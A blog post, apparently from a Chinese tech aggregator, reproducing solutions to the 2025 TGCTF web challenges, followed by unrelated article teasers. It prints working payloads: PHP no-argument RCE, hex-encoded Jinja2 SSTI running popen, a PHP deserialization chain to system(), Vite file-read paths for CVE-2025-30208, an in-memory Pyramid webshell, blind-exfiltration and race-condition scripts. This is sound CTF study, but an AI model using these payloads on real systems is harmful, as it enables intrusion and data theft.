当前位置：首页 > news >正文

2025TGCTF Web WP复现

news 来源：原创 2025/8/16 11:20:08

AAA 偷渡阴平

<?php$tgctf2025=$_GET['tgctf2025'];if(!preg_match("/0|1|[3-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\（|\）|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $tgctf2025)){//hint：你可以对着键盘一个一个看，然后在没过滤的符号上用记号笔画一下（bushieval($tgctf2025);
}
else{die('(╯‵□′)╯炸弹！•••*～●');
}highlight_file(__FILE__);

没有引号, 无法在函数里面传参, 用到无参数命令执行的点

?tgctf2025=eval(array_rand(array_flip(getallheaders())));

多执行几次

在这里插入图片描述

火眼辩魑魅

robots.txt

User-Agent: *
Disallow: tgupload.php
Disallow: tgshell.php
Disallow: tgxff.php
Disallow: tgser.php
Disallow: tgphp.php
Disallow: tginclude.php

题目首页说了执行 shell, 直接看到 tgshell.php

<?php$shell=$_POST["shell"];{eval($shell);}
?>

执行了一下 phpinfo(); 确实可以执行命令, 但是过滤了挺多, 开始还没绕过去

后面想到都给了 shell, 直接蚁剑连一下就可以了, 直接拿 flag

在这里插入图片描述

直面天命

读取文件

/aazz?filename=app.py

源码

import os
import string
from flask import Flask, request, render_template_string, jsonify, send_from_directory
from a.b.c.d.secret import secret_keyapp = Flask(__name__)black_list=['{','}','popen','os','import','eval','_','system','read','base','globals']
def waf(name):for x in black_list:if x in name.lower():return Truereturn False
def is_typable(char):# 定义可通过标准 QWERTY 键盘输入的字符集typable_chars = string.ascii_letters + string.digits + string.punctuation + string.whitespacereturn char in typable_chars@app.route('/')
def home():return send_from_directory('static', 'index.html')@app.route('/jingu', methods=['POST'])
def greet():template1=""template2=""name = request.form.get('name')template = f'{name}'if waf(name):template = '想干坏事了是吧hacker？哼，还天命人，可笑，可悲，可叹<br><img src="{{  url_for("static", filename="3.jpeg") }}" alt="Image">'else:k=0for i in name:if is_typable(i):continuek=1breakif k==1:if not (secret_key[:2] in name and secret_key[2:]):template = '连“六根”都凑不齐，谈什么天命不天命的，还是戴上这金箍吧<br><br>再去西行历练历练<br><br><img src="{{  url_for("static", filename="4.jpeg") }}" alt="Image">'return render_template_string(template)template1 = "“六根”也凑齐了，你已经可以直面天命了！我帮你把“secret_key”替换为了“{{}}”<br>最后，如果你用了cat，就可以见到齐天大圣了<br>"template= template.replace("直面","{{").replace("天命","}}")template = templateif "cat" in template:template2 = '<br>或许你这只叫天命人的猴子，真的能做到？<br><br><img src="{{  url_for("static", filename="2.jpeg") }}" alt="Image">'try:return template1+render_template_string(template)+render_template_string(template2)except Exception as e:error_message = f"500报错了，查询语句如下：<br>{template}"return error_message, 400@app.route('/hint', methods=['GET'])
def hinter():template="hint：<br>有一个由4个小写英文字母组成的路由，去那里看看吧，天命人!"return render_template_string(template)@app.route('/aazz', methods=['GET'])
def finder():filename = request.args.get('filename', '')if filename == "":return send_from_directory('static', 'file.html')if not filename.replace('_', '').isalnum():content = jsonify({'error': '只允许字母和数字！'}), 400if os.path.isfile(filename):try:with open(filename, 'r') as file:content = file.read()return contentexcept Exception as e:return jsonify({'error': str(e)}), 500else:return jsonify({'error': '路径不存在或者路径非法'}), 404if __name__ == '__main__':app.run(host='0.0.0.0', port=80)

可以读 secret

/aazz?filename=a/b/c/d/secret.py

在这里插入图片描述

这样就可以正常 ssti 了, 自动给了{{}}

name=直面config天命根据源码的逻辑可能还是要改一下, 这里lipsum这个位置去执行, 需要一些绕过的手段
name=直面cat天命直面lipsum天命

最后的 payload:

name=直面cat天命直面lipsum|attr("\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f")|attr("\u0067\u0065\u0074")("\u006f\u0073")|attr("\u0070\u006f\u0070\u0065\u006e")("cat+/flag")|attr("\u0072\u0065\u0061\u0064")()天命

什么文件上传？

robots.txt

User-Agent: *
Disallow: /admin/
Disallow: /private/
Disallow: /baidu
Disallow: /s?
Disallow: /unlink
Disallow: /phar
Disallow: !@*($^&*!@^&!*(@$# <--!文件上传后缀是三个小写字母 !@#$*&^(!%@#$#^&!-->
Disallow: /class.php

直接/class.php 打 php 反序列化就行

<?php
highlight_file(__FILE__);
error_reporting(0);
function best64_decode($str)
{return base64_decode(base64_decode(base64_decode(base64_decode(base64_decode($str)))));
}
class yesterday {public $learn;public $study="study";public $try;public function __construct(){$this->learn = "learn<br>";}public function __destruct(){echo "You studied hard yesterday.<br>";return $this->study->hard(); //hard()不存在, 进入到__call, study=new today}
}
class today {public $doing;public $did;public $done;public function __construct(){$this->did = "What you did makes you outstanding.<br>";}public function __call($arg1, $arg2){$this->done = "And what you've done has given you a choice.<br>";echo $this->done;if(md5(md5($this->doing))==666){ //__toString(), doing=new future()return $this->doing();}else{return $this->doing->better;}}
}
class tommoraw {public $good;public $bad;public $soso;public function __invoke(){$this->good="You'll be good tommoraw!<br>";echo $this->good;}public function __get($arg1){$this->bad="You'll be bad tommoraw!<br>";}}
class future{private $impossible="How can you get here?<br>";private $out;private $no;public $useful1;public $useful2;public $useful3;public $useful4;public $useful5;public $useful6;public $useful7;public $useful8;public $useful9;public $useful10;public $useful11;public $useful12;public $useful13;public $useful14;public $useful15;public $useful16;public $useful17;public $useful18;public $useful19;public $useful20;public function __set($arg1, $arg2) {if ($this->out->useful7) {echo "Seven is my lucky number<br>";system('whoami');}}public function __toString(){echo "This is your future.<br>";system($_POST["wow"]);return "win";}public function __destruct(){$this->no = "no";return $this->no;}
}
if (file_exists($_GET['filename'])){echo "Focus on the previous step!<br>";
}
else{$data=substr($_GET['filename'],0,-4);unserialize(best64_decode($data));
}//
$a=new yesterday();
$a->study = new today();
$a->study->doing = new future();
echo base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(serialize($a))))));

前端 GAME

CVE-2025-30208&31125: Vite 任意文件读取漏洞

也告诉了 flag 在 /tgflagggg, 直接读

/@fs/tgflagggg?import&raw??

(ez)upload

一直没找到源码, dirsearch扫了几遍都没有

手动试了一下, 源码在 upload.php.bak

<?php
define('UPLOAD_PATH', __DIR__ . '/uploads/');
$is_upload = false;
$msg = null;
$status_code = 200; // 默认状态码为 200
if (isset($_POST['submit'])) {if (file_exists(UPLOAD_PATH)) {$deny_ext = array("php", "php5", "php4", "php3", "php2", "html", "htm", "phtml", "pht", "jsp", "jspa", "jspx", "jsw", "jsv", "jspf", "jtml", "asp", "aspx", "asa", "asax", "ascx", "ashx", "asmx", "cer", "swf", "htaccess");if (isset($_GET['name'])) {$file_name = $_GET['name'];} else {$file_name = basename($_FILES['name']['name']);}$file_ext = pathinfo($file_name, PATHINFO_EXTENSION);if (!in_array($file_ext, $deny_ext)) {$temp_file = $_FILES['name']['tmp_name'];$file_content = file_get_contents($temp_file);if (preg_match('/.+?</s', $file_content)) {$msg = '文件内容包含非法字符，禁止上传！';$status_code = 403; // 403 表示禁止访问} else {$img_path = UPLOAD_PATH . $file_name;if (move_uploaded_file($temp_file, $img_path)) {$is_upload = true;$msg = '文件上传成功！';} else {$msg = '上传出错！';$status_code = 500; // 500 表示服务器内部错误}}} else {$msg = '禁止保存为该类型文件！';$status_code = 403; // 403 表示禁止访问}} else {$msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';$status_code = 404; // 404 表示资源未找到}
}// 设置 HTTP 状态码
http_response_code($status_code);// 输出结果
echo json_encode(['status_code' => $status_code,'msg' => $msg,
]);

比较经典

在这里插入图片描述

熟悉的配方，熟悉的味道

from pyramid.config import Configurator
from pyramid.request import Request
from pyramid.response import Response
from pyramid.view import view_config
from wsgiref.simple_server import make_server
from pyramid.events import NewResponse
import re
from jinja2 import Environment, BaseLoadereval_globals = { #防止eval执行恶意代码'__builtins__': {},      # 禁用所有内置函数'__import__': None       # 禁止动态导入
}def checkExpr(expr_input):expr = re.split(r"[-+*/]", expr_input)print(exec(expr_input))if len(expr) != 2:return 0try:int(expr[0])int(expr[1])except:return 0return 1def home_view(request):expr_input = ""result = ""if request.method == 'POST':expr_input = request.POST['expr']if checkExpr(expr_input):try:result = eval(expr_input, eval_globals)except Exception as e:result = eelse:result = "爬！"template_str = 【xxx】env = Environment(loader=BaseLoader())template = env.from_string(template_str)rendered = template.render(expr_input=expr_input, result=result)return Response(rendered)if __name__ == '__main__':with Configurator() as config:config.add_route('home_view', '/')config.add_view(home_view, route_name='home_view')app = config.make_wsgi_app()server = make_server('0.0.0.0', 9040, app)server.serve_forever()

检查之前可以执行exec, 没有过滤

def checkExpr(expr_input):expr = re.split(r"[-+*/]", expr_input)print(exec(expr_input))

没有回显, 写文件, 不过这里没有一些静态文件可以查看, 应该不行

反弹shell , 本地可以, 题目不行, 应该不出网

可以时间盲注

import requests
import time
import stringurl = "http://127.0.0.1:33632/"flag = ""
for i in range(50):found = Falsefor char in string.printable:print(char)payload = f"""
import os,time
a=os.popen('cat /fl*').read()
if len(a) > {i} and a[{i}]== '{char}' :time.sleep(5)
"""start = time.time()requests.post(url, data={"expr": payload})end = time.time()if end - start > 5:flag += charprint(f"位置 {i + 1}: {char}, 当前flag: {flag}")found = Truebreakif not found:breakprint("最终flag:", flag)

环境太慢了, 就不继续跑了
在这里插入图片描述

可以打内存马

根据原程序代码的构造, 先拿到config, app

expr=import sys;main=sys.modules['__main__'];print(dir(main))

在这里插入图片描述

拿到了config 和app, 添加路由

add_route 第一个参数是路由名, 第二个是路由路径

add_view的第一个参数是一个实现函数, 可以用匿名函数来实现, 第二个参数是路由名

Response表示请求路由后的回显结果

比如:

expr=import sys;config=sys.modules['__main__'].config;app=sys.modules['__main__'].app;
config.add_route('cmd','/xpw');config.add_view(lambda a:Response("hello 111"),route_name='cmd');
app = config.make_wsgi_app()

在这里插入图片描述

现在就可以构造实现rce了

request 是一个 请求对象，它封装了来自客户端的 HTTP 请求信息

request.params：包含查询字符串（如 ?key=value）和 POST 数据的合并结果。

expr=import sys;config=sys.modules['__main__'].config;app=sys.modules['__main__'].app;
config.add_route('cmd','/cmd');config.add_view(lambda request:Response(__import__('os').popen(request.params.get('cmd')).read()),route_name='cmd');
app = config.make_wsgi_app()

在这里插入图片描述

本地可以打通了, 直接用这个payload打题目环境就行
在这里插入图片描述

看题目环境里面有static静态目录, 就想尝试看看能不能写入文件

expr=import+os;os.system("ls >/app/stati/1.txt")

可以发现确实是可以写入的, 但是无法直接通过路由 /static/1.txt 访问, 一般应该是可以访问的,这里可能做了一些限制?

在这里插入图片描述

通过http的协议头回显

https://xz.aliyun.com/news/16143

expr=import+os;built=re.split.__globals__['__builtins__'];setattr=built['setattr'];serverHandler=built['__import__']('wsgiref').simple_server.ServerHandler;setattr(serverHandler,"http_version",os.popen("whoami").read());

在这里插入图片描述

本地可以测试成功

但是题目环境竟然不行, 有点奇怪

尝试500报错

expr=import+os;built=re.split.__globals__['__builtins__'];setattr=built['setattr'];baseHandler=built['__import__']('wsgiref').handlers.BaseHandler;setattr(baseHandler,"error_body",os.popen("whoami").read().encode());

在这里插入图片描述

本地依旧是可行的

题目环境依旧不行, 有点奇怪

在这里插入图片描述

直面天命(复仇)

过滤的更多了

import os
import string
from flask import Flask, request, render_template_string, jsonify, send_from_directory
from a.b.c.d.secret import secret_keyapp = Flask(__name__)black_list=['lipsum','|','%','{','}','map','chr', 'value', 'get', "url", 'pop','include','popen','os','import','eval','_','system','read','base','globals','_.','set','application','getitem','request', '+', 'init', 'arg', 'config', 'app', 'self']
def waf(name):for x in black_list:if x in name.lower():return Truereturn False
def is_typable(char):# 定义可通过标准 QWERTY 键盘输入的字符集typable_chars = string.ascii_letters + string.digits + string.punctuation + string.whitespacereturn char in typable_chars@app.route('/')
def home():return send_from_directory('static', 'index.html')@app.route('/jingu', methods=['POST'])
def greet():template1=""template2=""name = request.form.get('name')template = f'{name}'if waf(name):template = '想干坏事了是吧hacker？哼，还天命人，可笑，可悲，可叹
Image'else:k=0for i in name:if is_typable(i):continuek=1breakif k==1:if not (secret_key[:2] in name and secret_key[2:]):template = '连“六根”都凑不齐，谈什么天命不天命的，还是戴上这金箍吧再去西行历练历练Image'return render_template_string(template)template1 = "“六根”也凑齐了，你已经可以直面天命了！我帮你把“secret_key”替换为了“{{}}”
最后，如果你用了cat，就可以见到齐天大圣了
"template= template.replace("天命","{{").replace("难违","}}")template = templateif "cat" in template:template2 = '
或许你这只叫天命人的猴子，真的能做到？Image'try:return template1+render_template_string(template)+render_template_string(template2)except Exception as e:error_message = f"500报错了，查询语句如下：
{template}"return error_message, 400@app.route('/hint', methods=['GET'])
def hinter():template="hint：
有一个aazz路由，去那里看看吧，天命人!"return render_template_string(template)@app.route('/aazz', methods=['GET'])
def finder():with open(__file__, 'r') as f:source_code = f.read()return f"
{source_code}
", 200, {'Content-Type': 'text/html; charset=utf-8'}if __name__ == '__main__':app.run(host='0.0.0.0', port=80)

使用 16 进制绕一下就行

name=天命''["\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f"]["\x5f\x5f\x62\x61\x73\x65\x5f\x5f"]["\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f"]()[132]["\x5f\x5f\x69\x6e\x69\x74\x5f\x5f"]["\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f"]["\x70\x6f\x70\x65\x6e"]("\x63\x61\x74\x20\x2f\x74\x67\x66\x66\x66\x66\x31\x31\x31\x31\x31\x61\x61\x61\x61\x67\x67\x67\x67\x67\x67\x67\x67")['re''ad']()难违天命cat难违

AAA 偷渡阴平（复仇）

不让用无参 rce 了

<?php$tgctf2025=$_GET['tgctf2025'];if(!preg_match("/0|1|[3-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\（|\）|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\|localeconv|pos|current|print|var|dump|getallheaders|get|defined|str|split|spl|autoload|extensions|eval|phpversion|floor|sqrt|tan|cosh|sinh|ceil|chr|dir|getcwd|getallheaders|end|next|prev|reset|each|pos|current|array|reverse|pop|rand|flip|flip|rand|content|echo|readfile|highlight|show|source|file|assert/i", $tgctf2025)){//hint：你可以对着键盘一个一个看，然后在没过滤的符号上用记号笔画一下（bushieval($tgctf2025);
}
else{die('(╯‵□′)╯炸弹！•••*～●');
}highlight_file(__FILE__);

能用的就是

2, !, 字母, (), |

理论上应该是可以通过PCRE回溯次数限制绕过preg_match, 只要超过100万就行, 但是这个题目估计有啥限制没成功

可以用的session_id()

控制cookie中的PHPSESSID

?tgctf2025=session_start();system(hex2bin(session_id()));

在这里插入图片描述

有点搞不懂这个, 题目环境是nginx的, 为什么还可以用这个函数apache_request_headers(),有点不理解

/?tgctf2025=system(hex2bin(key(apache_request_headers())));

前端GAME plus

/@fs/app/?../../../tgflagggg?import&?raw/@fs/tgflagggg?import&?meteorkai.svg?.wasm?init
这个payload拿到的文件内容需要base64解码

前端GAME Ultra

https://mp.weixin.qq.com/s/HMhzXqSplWa-IwpftxwTiA

需要知道Vite所在的绝对路径

先随便访问一个, 允许的是/app, 那么这个大概就是其路径所在了

在这里插入图片描述

直接利用payload读文件 ( 直接在浏览器请求没有作用 )
/@fs/app/#/../../../../../etc/passwd

在这里插入图片描述

默认的flag文件是tgflagggg
/@fs/app/#/../../../../../tgflagggg但是也可以考虑通过环境变量读取
/@fs/app/#/../../../../../proc/self/envir

在这里插入图片描述

老登，炸鱼来了？

package mainimport ("fmt""io""log""net/http""os""path/filepath""strings""text/template""time"
)type Note struct {Name       stringModTime    stringSize       int64IsMarkdown bool
}var templates = template.Must(template.ParseGlob("templates/*"))type PageData struct {Notes []NoteError string
}func blackJack(path string) error {if strings.Contains(path, "..") || strings.Contains(path, "/") || strings.Contains(path, "flag") {return fmt.Errorf("非法路径")}return nil
}func renderTemplate(w http.ResponseWriter, tmpl string, data interface{}) {safe := templates.ExecuteTemplate(w, tmpl, data)if safe != nil {http.Error(w, safe.Error(), http.StatusInternalServerError)}
}func renderError(w http.ResponseWriter, message string, code int) {w.WriteHeader(code)templates.ExecuteTemplate(w, "error.html", map[string]interface{}{"Code":    code,"Message": message,})
}func main() {os.Mkdir("notes", 0755)safe := blackJack("/flag") //错误示范，return fmt.Errorf("非法路径")http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {files, safe := os.ReadDir("notes")if safe != nil {renderError(w, "无法读取目录", http.StatusInternalServerError)return}var notes []Notefor _, f := range files {if f.IsDir() {continue}info, _ := f.Info()notes = append(notes, Note{Name:       f.Name(),ModTime:    info.ModTime().Format("2006-01-02 15:04"),Size:       info.Size(),IsMarkdown: strings.HasSuffix(f.Name(), ".md"),})}renderTemplate(w, "index.html", PageData{Notes: notes})})http.HandleFunc("/read", func(w http.ResponseWriter, r *http.Request) {name := r.URL.Query().Get("name")if safe = blackJack(name); safe != nil {renderError(w, safe.Error(), http.StatusBadRequest)return}file, safe := os.Open(filepath.Join("notes", name))if safe != nil {renderError(w, "文件不存在", http.StatusNotFound)return}data, safe := io.ReadAll(io.LimitReader(file, 10240))if safe != nil {renderError(w, "读取失败", http.StatusInternalServerError)return}if strings.HasSuffix(name, ".md") {w.Header().Set("Content-Type", "text/html")fmt.Fprintf(w, `<html><head><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/github-markdown-css/5.1.0/github-markdown.min.css"></head><body class="markdown-body">%s</body></html>`, data)} else {w.Header().Set("Content-Type", "text/plain")w.Write(data)}})http.HandleFunc("/write", func(w http.ResponseWriter, r *http.Request) {if r.Method != "POST" {renderError(w, "方法不允许", http.StatusMethodNotAllowed)return}name := r.FormValue("name")content := r.FormValue("content")if safe = blackJack(name); safe != nil {renderError(w, safe.Error(), http.StatusBadRequest)return}if r.FormValue("format") == "markdown" && !strings.HasSuffix(name, ".md") {name += ".md"} else {name += ".txt"}if len(content) > 10240 {content = content[:10240]}safe := os.WriteFile(filepath.Join("notes", name), []byte(content), 0600)if safe != nil {renderError(w, "保存失败", http.StatusInternalServerError)return}http.Redirect(w, r, "/", http.StatusSeeOther)})http.HandleFunc("/delete", func(w http.ResponseWriter, r *http.Request) {name := r.URL.Query().Get("name")if safe = blackJack(name); safe != nil {renderError(w, safe.Error(), http.StatusBadRequest)return}safe := os.Remove(filepath.Join("notes", name))if safe != nil {renderError(w, "删除失败", http.StatusInternalServerError)return}http.Redirect(w, r, "/", http.StatusSeeOther)})// 静态文件服务http.Handle("/static/", http.StripPrefix("/static/", http.FileServer(http.Dir("static"))))srv := &http.Server{Addr:         ":9046",ReadTimeout:  10 * time.Second,WriteTimeout: 15 * time.Second,}log.Fatal(srv.ListenAndServe())
}

没学过go, 跟着wp浅浅的理解一下这道题的思路

因为go的语言特性的原因

:= 表示声明一个变量以及给这个变量赋值
=  表示给一个变量赋值
区别就是  `:=` 相当于新建了一个变量, 而=是给一个以及存在的变量赋值

而对于这道题目, 想要拿到flag, 就是要读取文件, 需要路径穿越, 但是有waf, 不让用.. /

也绕不过去, 想要读flag文件肯定是需要../的

func blackJack(path string) error {if strings.Contains(path, "..") || strings.Contains(path, "/") || strings.Contains(path, "flag") {return fmt.Errorf("非法路径")}return nil
}

而源码里面

if safe = blackJack(name); safe != nil {renderError(w, safe.Error(), http.StatusBadRequest)return}

safe = blackJack(name) , 说明此时safe是一个已经存在的一个变量

那么这里就可以存在一个条件竞争的一个很短的时间点

当给name随便传入一个不在黑名单的参数, safe被赋值为nil

当并发执行的时候, 可能就会存在另外一个线程 ,给name传参 ../../../flag

而此时的safe还是前面赋值的nil

我对这里的理解就是, 传入的非法name,经过blackJack()检查之后, 给safe赋值"非法路径"

此时另外一个线程也正好就比它晚一点点,对合法的name经过blackJack()检查, 给safe赋值"nil", 那么现在的safe在还没判断之前就从"非法路径"更新为"nil"了, 就通过了 safe!=nil的判断, 就可以进入到后面读取文件并返回内容了

而如果这里的是safe:=blackJack(name), 那么就是每个线程都是自己的独立的变量了, 其他的线程访问不了, 类似于加锁, 就无法条件竞争了

官方wp的脚本

import aiohttp
import asyncio
import timeclass Solver:def __init__(self, baseUrl):self.baseUrl = baseUrlself.READ_FILE_ENDPOINT = f'{self.baseUrl}'self.VALID_CHECK_PARAMETER = '/read?name=1'self.INVALID_CHECK_PARAMETER = '/read?name= / / /flag'self.RACE_CONDITION_JOBS = 100async def raceValidationCheck(self, session, parameter):url = f'{self.READ_FILE_ENDPOINT}{parameter}'async with session.get(url) as response:return await response.text()async def raceCondition(self, session):tasks = list()for _ in range(self.RACE_CONDITION_JOBS):tasks.append(self.raceValidationCheck(session, self.VALID_CHECK_PARAMETER))tasks.append(self.raceValidationCheck(session, self.INVALID_CHECK_PARAMETER))return await asyncio.gather(*tasks)async def solve(self):async with aiohttp.ClientSession() as session:attempts = 1finishedRaceConditionJobs = 0while True:print(f'[*] Attempts: {attempts} - Finished race condition jobs: {finishedRaceConditionJobs}')results = await self.raceCondition(session)attempts += 1finishedRaceConditionJobs += self.RACE_CONDITION_JOBSfor result in results:if 'TGCTF{' not in result:continueprint(f'\n[+] We won the race window! Flag: {result.strip()}')exit(0)if __name__ == '__main__':baseUrl = 'http://127.0.0.1:30604//'solver = Solver(baseUrl)asyncio.run(solver.solve())

爆不出, 放弃

在这里插入图片描述

2025TGCTF Web WP复现

AAA 偷渡阴平 <?php$tgctf2025$_GET[tgctf2025];if(!preg_match("/0|1|[3-9]|\~|\|\|\#|\\$|\%|\^|\&|\*|\（|\）|\-|\|\|\{|\[|\]|\}|\:|\|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $tgctf2025)){//hint：你可以对着键盘…...

编程日记 2025/8/16 11:20:08

交叉注意力层的实质作用:连接编码器和解码器

交叉注意力层的实质作用在Transformer架构里，交叉注意力层主要作用是连接编码器和解码器，让解码器能够利用编码器输出的上下文信息。具体来说：聚焦相关信息：以机器翻译任务为例，在将源语言句子翻译成目标语言时，交叉注意力能使解码器生成的每个词，都聚焦于源语言序列…...

编程日记 2025/8/15 13:32:04

conversation_template | conversation_actors | conversation_line_template

目录 conversation_template conversation_actors conversation_line_template 实例应用 conversation_template id：某段谈话的唯一编号FirstLineId：谈话开始的第一段话的编号，取值来源 ConversationLine.db2 的 ID 字段TextureKitId&am…...

编程日记 2025/8/13 16:44:55

C++ `shared_ptr` 多线程使用

C shared_ptr 多线程使用一、核心结论引用计数：shared_ptr 的引用计数操作是原子的，线程安全控制块修改：修改 shared_ptr 指向的对象需要同步被管理对象：若对象本身非线程安全，访问时仍需加锁二、分场景详解场景…...

编程日记 2025/8/5 12:01:09

十天借助 Trae 实现 “幸运塔塔屋” 小程序时光记忆功能之旅

在软件开发的广阔天地中，创新与效率始终是开发者们不懈追求的目标。近期，我成功完成了一次极具挑战性与创新性的实践 —— 仅用十天时间，借助 Trae 这款强大的 AI 工具，开发出了 “幸运塔塔屋” 小程序，其中的 “时光记…...

编程日记 2025/8/10 21:44:31

WiFi“管家”------hostapd的工作流程

目录 1. 启动与初始化 1.1 解析命令行参数 1.2 读取配置文件 1.3 创建接口和 BSS 数据结构 1.4 初始化驱动程序 2. 认证和关联处理 2.1 监听认证请求 2.2 处理认证请求 2.3 处理关联请求 3. 数据转发 3.1 接收客户端数据 3.2 转发数据 4. 断开连接处理 4.1 处理客…...

编程日记 2025/8/16 11:19:46

计算机视觉——基于使用 OpenCV 与 Python 实现相机标定畸变校正

概述相机标定是一种旨在通过确定相机的内参（焦距、光学中心、畸变系数）和外参（相机的位置和方向），提高图像在现实世界中的几何精度的过程。该过程可以纠正相机拍摄的图像中的畸变，使相机能够准确感知现实…...

编程日记 2025/8/13 20:42:52

OOM 未触发 JVM 崩溃的可能原因

1. OOM 未触发 JVM 崩溃的可能原因‌ (1) 未配置 JVM 参数强制崩溃‌ 关键参数缺失‌： 若未添加 -XX:CrashOnOutOfMemoryError，JVM 在 OOM 时可能仅抛出异常并正常退出，而非崩溃，因此不会生成 hs_err_pid.log。 # 正确配置示例&…...

编程日记 2025/8/11 14:10:37

计算机视觉cv2入门之车牌号码识别

前边我们已经讲解了使用cv2进行图像预处理与边缘检测等方面的知识，这里我们以车牌号码识别这一案例来实操一下。大致思路车牌号码识别的大致流程可以分为这三步：图像预处理-寻找车牌轮廓-车牌OCR识别接下来我们按照这三步来进行讲解。图像预处理 …...

编程日记 2025/8/6 7:29:44

xml+html 概述

1.什么是xml xml 是可扩展标记语言的缩写： Extensible Markup Language。 <root><h1> text 1</h1> </root> web 应用开发，需要配置 web.xml，就是个典型的 xml文件 <web-app><servlet><servlet-name&…...

编程日记 2025/8/14 23:33:56

C++数据结构与二叉树详解

前言： 在C编程的世界里，数据结构是构建高效程序的基石，而二叉树则是其中最优雅且应用广泛的数据结构之一。本文将带你深入理解二叉树的本质、实现与应用，助你在算法设计中游刃有余。一、二叉树的基本概念 1. 什么是二叉树二叉树…...

编程日记 2025/8/11 5:16:14

‘’’ con 1 origin_stack = [ [4, 4, 1, 0, 0, 0], # 第一栈 [4, 3, 2, 1, 0, 0], # 第二栈 [4, 2, 2, 1, 0, 0], # 第三栈 [3, 3, 3, 1, 0, 0], # 第四栈 [3, 4, 2, 1, 0, 0], # 第五栈 [4, 2, 3, 2, 0, 0] # 第六栈 ] con 2 origin_stack = [ [4, 4, 3, 0, 0, 0], # 第一栈…...

编程日记 2025/8/12 5:02:11

Java 序列化与反序列化终极解析

Java 序列化与反序列化终极解析 1. 核心概念 (1) 什么是序列化？ 定义：将对象转换为字节流的过程（对象 → 字节） 目的： 持久化存储（如保存到文件） 网络传输（如RPC调用&#xff09…...

编程日记 2025/8/9 15:08:56

YOLOv5、YOLOv6、YOLOv7、YOLOv8、YOLOv9、YOLOv10、YOLOv11、YOLOv12的网络结构图

文章目录一、YOLOv5二、YOLOv6三、YOLOv7四、YOLOv8五、YOLOv9六、YOLOv10七、YOLOv11八、YOLOv12九、目标检测系列文章本文将给出YOLO各版本（YOLOv5、YOLOv6、YOLOv7、YOLOv8、YOLOv9、YOLOv10、YOLOv11、YOLOv12）网络结构图的绘制方法及图。本文所展…...

编程日记 2025/8/13 15:47:08

leetcode0145. 二叉树的后序遍历-easy

1 题目：二叉树的后序遍历官方标定难度：易给你一棵二叉树的根节点 root ，返回其节点值的后序遍历。示例 1： 输入：root [1,null,2,3] 输出：[3,2,1] 解释： 示例 2： 输入…...

编程日记 2025/8/11 2:58:30

【Leetcode 每日一题】2364. 统计坏数对的数目

问题背景给你一个下标从 0 0 0 开始的整数数组 n u m s nums nums。如果 i < j i < j i<j 且 j − i ≠ n u m s [ j ] − n u m s [ i ] j - i \ne nums[j] - nums[i] j−inums[j]−nums[i]，那么我们称 ( i , j ) (i, j) (i,j) 是一个坏数对。…...

编程日记 2025/8/11 22:21:59

完整的 .NET 6 分布式定时任务实现（Hangfire + Redis 分布式锁）

完整的 .NET 6 分布式定时任务实现（Hangfire Redis 分布式锁） 以下是完整的解决方案，包含所有必要组件： 1. 基础设施层 1.1 分布式锁服务 // IDistributedLockService.cs public interface IDistributedLockService {ValueTa…...

编程日记 2025/8/12 5:45:04

人脸识别联合行为检测的办公管理新模式

基于人脸识别与行为检测的办公智能化解决方案一、背景在传统办公场景中，员工考勤管理、工位使用情况统计、安全监控等环节存在诸多痛点。例如，传统考勤方式如指纹打卡、刷卡等存在代打卡现象，考勤数据不准确；对于员工是否在工…...

编程日记 2025/8/14 20:23:26

鸿蒙NEXT开发键盘工具类（ArkTs）

export declare type KeyboardCallBack (show: boolean, height: number) > void; import { AppUtil } from ./AppUtil; import { LogUtil } from ./LogUtil; import { ArrayUtil } from ./ArrayUtil;/*** 键盘工具类* author 鸿蒙布道师* since 2025/04/18*/ export class…...

编程日记 2025/8/15 22:18:49

Python爬虫第17节-动态渲染页面抓取之Selenium使用下篇

目录引言一、获取节点信息 1.1 获取属性 1.2 获取文本值 1.3 获取ID、位置、标签名、大小二、切换Frame 三、延时等待 3.1 隐式等待 3.2 显式等待四、前进后退五、Cookies 六、选项卡管理七、异常处理引言这一节我们继续讲解Selenium的使用下篇&#xff0…...

编程日记 2025/8/10 15:04:43

【数据结构】第四弹——LinkedList与链表

文章目录一. ArrayList 的缺陷二.链表2.1 链表的概念及结构2.2 链表的结构2.2.1 单向或者双向2.2.2 带头或者不带头2.2.3 循环非循环 2.3 链表的实现1. IList接口2. MySingleList 类中具体实现(不带头单向非循环链表)1. 节点抽象成内部类手搓一个链表2. 头插法3. 尾插法4. 指定…...

编程日记 2025/8/16 1:35:17

设计模式从入门到精通之（五）观察者模式

观察者模式：实现高效事件通知的秘诀在日常生活中，我们经常需要同步通知多方的信息变更。比如天气预报系统、股票价格波动提醒、社交媒体的点赞通知等。这些场景中，通知机制需要高效、灵活，而不会因为通知方的变化影响系统整体。 …...

编程日记 2025/8/14 3:55:22

chili3d调试笔记3 加入c++ 大模型对话方法 cmakelists精读

加入 #include <emscripten/bind.h> #include <emscripten/val.h> #include <nlohmann/json.hpp> 怎么加包函数直接用emscripten::function，如： emscripten::function("send_to_llm", &send_to_llm); set (CMAKE_C…...

编程日记 2025/8/16 8:29:37

使用人工智能大模型kimi，如何免费制作PPT？

使用人工智能大模型kimi，如何免费制作PPT？ 手把手操作视频https://edu.csdn.net/learn/40406/666573...

编程日记 2025/8/5 14:46:07

ModbusTCP 转 Profinet 主站网关

一、功能概述 1.1 设备简介本产品是 ModbusTCP 和 Profinet(M) 网关（以下简称网关），使用数据映射方式工作。本产品在 ModbusTCP 侧作为 ModbusTCP 从站，接 PLC 、上位机、 wincc 屏等；在 Profin…...

编程日记 2025/8/9 6:18:28

进阶篇｜CAN FD 与性能优化

引言 1. CAN vs. CAN FD 对比 2. CAN FD 帧结构详解...

编程日记 2025/8/12 2:33:11

6.6 “3步调用ChatGPT打造高可靠Python调度器，零依赖实现定时任务自动化“

